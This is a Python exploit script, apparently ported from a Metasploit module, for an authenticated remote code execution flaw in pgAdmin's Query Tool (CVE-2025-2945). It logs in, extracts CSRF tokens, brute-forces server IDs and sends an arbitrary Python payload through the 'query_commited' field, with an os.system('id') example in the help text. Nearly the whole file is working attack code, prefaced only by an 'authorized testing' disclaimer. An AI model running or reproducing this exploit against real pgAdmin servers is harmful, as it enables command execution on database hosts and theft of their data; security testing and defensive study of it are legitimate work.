#!/usr/bin/env python3
"""
pgAdmin Query Tool authenticated RCE (CVE-2025-2945) -- Python port.

The caller must possess valid pgAdmin credentials (username/password) to log
in via POST /login. Use only against systems you are authorized to test.

Translated from the Metasploit module "pgAdmin Query Tool authenticated RCE
(CVE-2025-2945)":
  - Original Ruby: https://github.com/rapid7/metasploit-framework
  - This Python script reproduces the same steps:
      1) Authenticate to pgAdmin
      2) Initialize the SQL editor (gets a transaction ID, sgid, sid, did)
      3) Iterate over server IDs until one "works"
      4) POST a payload via `query_commited` -> expected 500 response
"""
import argparse
import json
import random
import sys
from urllib.parse import urljoin, urlencode

import requests
from faker import Faker

fake = Faker()

# Seconds to wait for any single HTTP request before giving up. Without an
# explicit timeout, requests waits indefinitely on an unresponsive host.
DEFAULT_TIMEOUT = 30.0

# Header pgAdmin reads the CSRF token from (HTTP header names are
# case-insensitive; one spelling is used everywhere for consistency).
CSRF_HEADER = "X-pgA-CSRFToken"


def _dig(doc, *keys):
    """
    Walk nested dicts in the manner of Ruby's Hash#dig.

    Returns the value found by following `keys` in order, or None as soon as
    any level is missing or is not a dict (e.g. a JSON `null` or a list).
    """
    for key in keys:
        if not isinstance(doc, dict):
            return None
        doc = doc.get(key)
    return doc


class PgAdminExploit:
    """
    Drives the request sequence against one pgAdmin instance.

    All HTTP traffic goes through a single requests.Session so that cookies
    set by the server persist between steps.
    """

    def __init__(self, args):
        """
        Copy the parsed CLI options and build the HTTP session.

        `args` is any object exposing the attributes read below (normally an
        argparse.Namespace). `timeout` is optional and defaults to
        DEFAULT_TIMEOUT so older callers that do not set it keep working.
        """
        self.rhost = args.rhost
        self.rport = args.rport
        self.username = args.username
        self.password = args.password
        self.db_user = args.db_user
        self.db_pass = args.db_pass
        self.db_name = args.db_name
        self.max_server_id = args.max_server_id
        self.payload = args.payload
        self.timeout = getattr(args, "timeout", DEFAULT_TIMEOUT)

        self.scheme = "http"
        self.base_url = f"{self.scheme}://{self.rhost}:{self.rport}"

        self.session = requests.Session()
        # Some default headers -- Metasploit's HttpClient sets things like a
        # User-Agent, etc.
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (Exploit Script)",
        })

    def get_csrf_token(self, from_page="/"):
        """
        Fetch `from_page` and return a CSRF token.

        The token is looked up in two places, in order:
          1) a session cookie named "pga_csrf_token", "pgaCookieCsrfToken"
             or "csrftoken";
          2) a hidden form field of the form `name="csrf_token" value="..."`
             in the returned HTML.

        The GET is issued first so that the server has a chance to set
        cookies. Prints an error and exits with status 1 if no token is found.
        """
        resp = self.session.get(
            urljoin(self.base_url, from_page),
            allow_redirects=True,
            timeout=self.timeout,
        )

        # 1) Try known cookie names.
        for cookie_name in ("pga_csrf_token", "pgaCookieCsrfToken", "csrftoken"):
            if cookie_name in self.session.cookies:
                return self.session.cookies.get(cookie_name)

        # 2) Fallback: parse the hidden input out of the HTML.
        text = resp.text
        marker = 'name="csrf_token" value="'
        idx = text.find(marker)
        if idx != -1:
            start = idx + len(marker)
            end = text.find('"', start)
            if end != -1:
                return text[start:end]

        print("[!] Unable to retrieve CSRF token. Exiting.")
        sys.exit(1)

    def authenticate(self):
        """
        Log in to pgAdmin with the configured username and password.

        Replicates the `authenticate(datastore['USERNAME'],
        datastore['PASSWORD'])` call in the Ruby module:
          1) GET /login to retrieve a CSRF token
          2) POST /login with form data {email, password, csrf_token}

        Anything other than a 302/303 response is treated as a failed login
        and terminates the process with status 1.
        """
        print("[*] Fetching CSRF token from login page...")
        csrf_token = self.get_csrf_token("/login")

        login_url = urljoin(self.base_url, "/login")
        data = {
            "email": self.username,
            "password": self.password,
            "csrf_token": csrf_token,
        }
        headers = {"Referer": login_url}

        # Redirects are not followed so the status code itself can be checked.
        resp = self.session.post(
            login_url,
            data=data,
            headers=headers,
            allow_redirects=False,
            timeout=self.timeout,
        )

        # pgAdmin typically redirects to /browser/ if login succeeds.
        if resp.status_code not in (302, 303):
            print(f"[!] Login failed or unexpected status code: {resp.status_code}")
            sys.exit(1)

        print("[+] Authenticated to pgAdmin successfully.")

    def get_post_data(self):
        """
        Build a URL-encoded form body with a random title and database id.

        Translated from `get_post_data` in Ruby:
            title = Faker::App.name.downcase
            selectedNodeInfo => { database: { id: Faker::App.name.downcase } }
            return URI.encode_www_form(...)

        Returns the encoded form data as a string.
        """
        title = fake.app_name().lower()
        db_id = fake.app_name().lower()
        payload_dict = {
            "title": title,
            "selectedNodeInfo": {
                "database": {
                    "id": db_id,
                },
            },
        }
        # NOTE: urlencode() converts each value with str(), so the nested
        # dict is sent as its Python repr, not as JSON.
        return urlencode(payload_dict)

    def post_initialize_sqleditor(self, trans_id, sgid, sid, did, csrf_token):
        """
        POST the database credentials to the sqleditor initialize endpoint.

        Equivalent to Ruby:
            send_request_cgi({
              'uri' => normalize_uri(target_uri.path,
                "/sqleditor/initialize/sqleditor/#{trans_id}/#{sgid}/#{sid}/#{did}"),
              'method' => 'POST',
              'keep_cookies' => true,
              'ctype' => 'application/json',
              'headers' => { 'X-pgA-CSRFToken' => csrf_token },
              'data' => {
                'user' => DB_USER, 'password' => DB_PASS,
                'role' => '', 'dbname' => DB_NAME
              }.to_json
            })

        A non-200 response prints the server's error message (or the raw
        body when no message can be extracted) and exits with status 1.
        """
        url = urljoin(
            self.base_url,
            f"/sqleditor/initialize/sqleditor/{trans_id}/{sgid}/{sid}/{did}",
        )
        headers = {
            "Content-Type": "application/json",
            CSRF_HEADER: csrf_token,
        }
        data = {
            "user": self.db_user,
            "password": self.db_pass,
            "role": "",
            "dbname": self.db_name,
        }

        print(f"[*] Initializing SQL editor: trans_id={trans_id}, sgid={sgid}, sid={sid}, did={did}")
        resp = self.session.post(url, headers=headers, json=data, timeout=self.timeout)

        if resp.status_code != 200:
            try:
                err = _dig(resp.json(), "result", "errmsg")
            except ValueError:
                # Body was not valid JSON.
                err = None
            if not err:
                err = resp.text or "unknown error"
            print(f"[!] Failed to initialize sqleditor: {err}")
            sys.exit(1)

        print("[+] Successfully initialized sqleditor.")

    def find_valid_server_id(self, sgid, csrf_token):
        """
        Probe server IDs 1..max_server_id and return the first usable one.

        Same as Ruby's find_valid_server_id(sgid):
            for sid in 1..MAX_SERVER_ID:
                GET /sqleditor/get_server_connection/{sgid}/{sid}
                    with X-pgA-CSRFToken
                if response.data.status -> return sid

        Responses that are not HTTP 200, are not JSON, or lack a truthy
        `data.status` are skipped. If no ID qualifies, prints an error and
        exits with status 1.
        """
        headers = {
            CSRF_HEADER: csrf_token,
            "Content-Type": "application/x-www-form-urlencoded",
        }

        for sid in range(1, self.max_server_id + 1):
            print(f"[*] Trying server ID: {sid}")
            url = urljoin(self.base_url, f"/sqleditor/get_server_connection/{sgid}/{sid}")
            resp = self.session.get(url, headers=headers, timeout=self.timeout)

            if resp.status_code != 200:
                continue

            try:
                doc = resp.json()
            except ValueError:
                continue

            # Ruby does: if res&.get_json_document&.dig('data','status')
            # _dig tolerates a null/non-object "data" instead of raising.
            if _dig(doc, "data", "status"):
                print(f"[+] Found valid server ID: {sid}")
                return sid

        print("[!] Failed to find a valid server ID. Try increasing MAX_SERVER_ID.")
        sys.exit(1)

    def sqleditor_init(self, trans_id, csrf_token):
        """
        Pick random group/database IDs, find a server ID and initialize.

        Ruby:
            sgid = rand(1..10)
            did = rand(10000..99999)
            sid = find_valid_server_id(sgid)
            post_initialize_sqleditor(trans_id, sgid, sid, did)

        Returns the tuple (sgid, sid, did).
        """
        sgid = random.randint(1, 10)
        did = random.randint(10000, 99999)
        sid = self.find_valid_server_id(sgid, csrf_token)
        self.post_initialize_sqleditor(trans_id, sgid, sid, did, csrf_token)
        # Returned in case the caller needs them later (not required here).
        return sgid, sid, did

    def exploit(self):
        """
        Run the full sequence:
          1) authenticate()
          2) trans_id = rand(1_000_000..9_999_999)
          3) sqleditor_init(trans_id)
          4) POST to /sqleditor/query_tool/download/{trans_id} with JSON
             { query_commited: payload } -> expects a 500 response

        Exits with status 1 if the final request gets no response at all;
        any other status code is reported but does not change the exit code.
        """
        self.authenticate()

        # Step 1: Generate a fresh transaction ID.
        trans_id = random.randint(1_000_000, 9_999_999)
        print(f"[*] Generated transaction ID: {trans_id}")

        # Step 2: Get a fresh CSRF token (after login, cookies may have changed).
        print("[*] Fetching a fresh CSRF token for sqleditor operations...")
        csrf_token = self.get_csrf_token(f"/sqleditor/panel/{trans_id}?is_query_tool=true")

        # Step 3: Initialize the SQL editor (find sgid/sid/did + POST that info).
        self.sqleditor_init(trans_id, csrf_token)

        # Step 4: Send the final request.
        print("[*] Exploiting the target by sending payload...")
        exploit_url = urljoin(self.base_url, f"/sqleditor/query_tool/download/{trans_id}")
        headers = {
            "Content-Type": "application/json",
            CSRF_HEADER: csrf_token,
            # The Metasploit module also sent a Referer header:
            "Referer": f"{self.base_url}/sqleditor/panel/{trans_id}?is_query_tool=true",
        }
        data = {"query_commited": self.payload}

        # requests never returns None; a missing response surfaces as an
        # exception (timeout, connection reset, ...), so that is what is
        # mapped to the "no response" outcome.
        try:
            resp = self.session.post(
                exploit_url,
                headers=headers,
                json=data,
                allow_redirects=False,
                timeout=self.timeout,
            )
        except requests.RequestException:
            print("[!] No response received from exploit attempt.")
            sys.exit(1)

        if resp.status_code == 500:
            print("[+] Received a 500 response from the exploit attempt (expected).")
            print("[+] If the payload is correct, remote code execution should have occurred.")
        else:
            print(f"[!] Received an unexpected response code: {resp.status_code}")
            print(f" Response body:\n{resp.text}")


def main():
    """Parse command-line options and run the sequence once."""
    parser = argparse.ArgumentParser(description="pgAdmin Query Tool authenticated RCE (CVE-2025-2945) exploit in Python")
    parser.add_argument("--rhost", required=True, help="Target pgAdmin host (IP or hostname)")
    parser.add_argument("--rport", required=False, type=int, default=80, help="Target pgAdmin port (default: 80)")
    parser.add_argument("--username", required=True, help="pgAdmin username")
    parser.add_argument("--password", required=True, help="pgAdmin password")
    parser.add_argument("--db-user", dest="db_user", required=True, help="Database user (to initialize SQL editor)")
    parser.add_argument("--db-pass", dest="db_pass", required=True, help="Database password")
    parser.add_argument("--db-name", dest="db_name", required=True, help="Database name")
    parser.add_argument("--payload", required=True, help="Arbitrary Python payload to send in `query_commited`. (e.g. \"__import__('os').system('id')\")")
    parser.add_argument("--max-server-id", dest="max_server_id", type=int, default=10, help="Maximum number of server IDs to try (default: 10)")
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, help="Per-request timeout in seconds (default: 30)")
    args = parser.parse_args()

    runner = PgAdminExploit(args)
    try:
        runner.exploit()
    except requests.RequestException as exc:
        # Connection refused, DNS failure, timeout, etc. on any earlier step:
        # report it in the script's usual style instead of a raw traceback.
        print(f"[!] HTTP request failed: {exc}")
        sys.exit(1)


if __name__ == "__main__":
    main()